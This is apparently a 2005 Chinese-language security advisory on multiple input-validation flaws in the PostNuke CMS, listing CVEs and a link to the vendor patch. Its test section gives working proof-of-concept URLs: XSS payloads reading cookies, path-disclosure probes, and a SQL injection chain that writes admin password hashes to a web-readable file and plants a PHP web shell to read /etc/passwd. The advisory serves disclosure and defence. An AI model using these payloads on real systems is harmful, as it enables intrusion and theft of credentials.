首页 -> 安全研究
安全研究
安全漏洞
PostNuke多个远程输入验证漏洞
发布日期:2005-05-26
更新日期:2005-05-26
受影响系统:
PostNuke PostNuke Phoenix 0.760-RC3不受影响系统:
PostNuke PostNuke Phoenix 0.760-RC2
PostNuke PostNuke Phoenix 0.750
PostNuke PostNuke Phoenix 0.750 b描述:
BUGTRAQ ID: 13706
CVE(CAN) ID: CVE-2005-1696,CVE-2005-1698,CVE-2005-1695,CVE-2005-1697,CVE-2005-1694
PostNuke是一款开放源码、开放开发的内容管理系统(CMS)。
PostNuke中存在多个输入验证漏洞,起因是应用程序没能正确的过滤用户提供的输入。
SQL注入漏洞可能允许远程攻击者向数据库查询提供恶意输入,导致修改查询逻辑或其他攻击。成功的攻击可能导致入侵应用程序,泄漏或修复数据,或允许攻击者利用基础数据库实现中的漏洞。
PostNuke还受多个跨站脚本漏洞的影响。攻击者可能利用这些漏洞在没有戒备用户的浏览器中执行任意脚本代码,导致窃取基于cookie的认证凭据或其他攻击。
<*来源:Maksymilian Arciemowicz (max@jestsuper.pl)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111670506926649&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=111670482500552&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=111670823128472&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?paletteid=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
如果可以看到php错误并注册global = On
http://[HOST]/[DIR]/modules/Multisites/installation/config.php?serverName=<H1>SUICIDE</H1>
或者对于0.750
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php?serverName=<H1>SUICIDE</H1>
- --- 完整路径泄漏 ---
http://[HOST]/[DIR]/modules/Xanthia/pndocs/themes/theme.php
Error message :
- ---------------
Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) \
[function.main]: failed to open stream: No such file or directory in \
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line \
8
Fatal error: main() [function.require]: Failed opening required \
'/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in \
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line \
8
- ---------------
http://[HOST]/[DIR]/modules/Xanthia/pnclasses/Xanthia.php
Error message :
- ---------------
Fatal error: Call to undefined function pnModGetVar() in \
/www/PostNuke-0.760-RC3/html/modules/Xanthia/pnclasses/Xanthia.php on \
line 48
- ---------------
http://[HOST]/[DIR]/modules/Blocks/pnblocks/user.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/thelang.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/text.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/html.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/menu.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/finclude.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/button.php
Error message :
- ---------------
Fatal error: Call to undefined function pnSecAddSchema() in \
/www/PostNuke-0.760-RC3/html/modules/Blocks/pnblocks/button.php on \
line 48
- ---------------
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php
或者对于0.760RC3
http://[HOST]/[DIR]/modules/Multisites/installation/config.php
Error message :
- ---------------
Warning: main(parameters/whoisit.inc.php) [function.main]: failed to open stream: No \
such file or directory in \
/www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2
Warning: main() [function.include]: Failed opening 'parameters/whoisit.inc.php' for \
inclusion (include_path='.:') in \
/www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php \
on line 2
- ---------------
http://[HOST]/[DIR]/xmlrpc.php
Error message :
- ---------------
Fatal error: Cannot redeclare xmlrpc_decode() in \
/www/PostNuke-0.760-RC3/html/modules/xmlrpc/lib/xmlrpc.inc on line \
1068
- ---------------
- --- RSS模块中的跨站脚本 ---
http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/magpie_slashbox.php?rss_url=[XSS]
http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/magpie_simple.php?url=">[XSS]
http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/magpie_debug.php?url=%22%3E[XSS]
- --- RSS模块中的完整路径泄漏 ---
http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/simple_smarty.php
- ---
Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) \
[function.main]: failed to open stream: No such file or directory in \
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line \
8
Fatal error: main() [function.require]: Failed opening required \
'/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in \
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line \
8
- --
- --- Sql注入 ---
[获取管理口令]
检查PostNuke目录
http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index
Error message :
- ---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in \
/www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php \
on line 977
- ---------------
比如前缀是/www/PostNuke-0.750/source/html/,现在可以进行攻击,但必须要知道数据库前缀。
http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20[db_prefix]users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3'/*&type=admin&func=view
错误消息是:
Error message :
- ---------------
Failed to load module Xanthia' UNION SELECT pn_uname,pn_pass FROM pn__users WHERE \
pn_uid=2 INTO OUTFILE \
'/www/PostNuke-0.750/source/html/pnTemp/Xanthia_cache/cXIb8O3'/* (at function: \
"view")
- ---------------
但现在转到
http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3
这样就获得了id=2用户的口令。
[无显示上载]
http://[HOST]/[DIR]/user.php?op=edituser
注入额外信息的php代码,例如:
- ---
<?php system($_GET[cXIb8O3]); ?>
- ---
现在就可以用这个代码创建php脚本,如:
http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_bio,pn_uname%20FROM%20[db_prefix]users%20WHERE%20pn_uid=[YOUR_ID]%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3.php'/*&type=admin&func=view
然后:
http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cXIb8O3=cat /etc/passwd
建议:
厂商补丁:
PostNuke
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-411.html
浏览次数:3539
严重程度:0(网友投票)
绿盟科技给您安全的保障